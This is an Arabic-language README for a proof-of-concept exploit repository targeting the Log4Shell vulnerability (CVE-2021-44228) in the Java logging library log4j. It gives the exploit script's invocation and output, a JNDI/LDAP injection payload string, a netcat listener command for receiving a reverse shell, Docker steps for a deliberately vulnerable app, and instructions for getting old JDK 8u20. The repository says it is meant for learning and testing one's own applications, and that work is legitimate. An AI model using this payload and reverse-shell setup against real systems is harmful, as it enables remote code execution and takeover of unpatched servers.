
إثبات مفهوم للثغرة الأمنية CVE-2021-44228.
إثبات مفهوم (PoC) للثغرة الأمنية المكتشفة مؤخرًا CVE-2021-44228.
مؤخرًا، تم اكتشاف ثغرة أمنية جديدة في log4j، وهي مكتبة تسجيل جافا تُستخدم على نطاق واسع في أنظمة مثل Elasticsearch و Minecraft والعديد من الأنظمة الأخرى.
في هذا المستودع، يوجد تطبيق مثال ضعيف وإثبات مفهوم (POC) لاستغلاله.
كإثبات للمفهوم، يوجد ملف بايثون يقوم بأتمتة العملية.
pip install -r requirements.txt
nc -lvnp 9001
jdk1.8.0_20، وأن يكون في نفس الدليل.$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
سيقوم هذا البرنامج النصي بإعداد خادم HTTP وخادم LDAP لك، وسيقوم أيضًا بإنشاء الحمولة (payload) التي يمكنك لصقها في الباراميتر الضعيف. بعد ذلك، إذا سارت الأمور بشكل جيد، يجب أن تحصل على صدفة على المنفذ lport.
يوجد ملف Dockerfile مع تطبيق ويب ضعيف. يمكنك استخدامه باتباع الخطوات التالية:
1: docker build -t log4j-shell-poc .
2: docker run --network host log4j-shell-poc
بمجرد تشغيله، يمكنك الوصول إليه على localhost:8080
توفر Oracle لحسن الحظ أرشيفًا لجميع إصدارات جافا السابقة:
https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html.
قم بالتمرير لأسفل إلى 8u20 وقم بتنزيل الملفات المناسبة لنظام التشغيل والأجهزة الخاصة بك.

ملاحظة: تحتاج إلى إنشاء حساب لتتمكن من تنزيل الحزمة.
بمجرد تنزيل وفك ضغط الأرشيف، يمكنك العثور على java وبعض الملفات الثنائية ذات الصلة في jdk1.8.0_20/bin.
ملاحظة: تأكد من فك ضغط مجلد jdk في هذا المستودع بنفس الاسم لكي يعمل.
❯ tar -xf jdk-8u20-linux-x64.tar.gz
❯ ./jdk1.8.0_20/bin/java -version
java version "1.8.0_20"
Java(TM) SE Runtime Environment (build 1.8.0_20-b26)
Java HotSpot(TM) 64-Bit Server VM (build 25.20-b23, mixed mode)
هذا المستودع ليس مخصصًا ليكون أداة استغلال بنقرة واحدة لـ CVE-2021-44228. الغرض من هذا المشروع هو مساعدة الأشخاص على التعرف على هذه الثغرة الأمنية، وربما اختبار تطبيقاتهم الخاصة (ومع ذلك هناك تطبيقات أفضل لهذا الغرض، مثل: https://log4shell.tools/).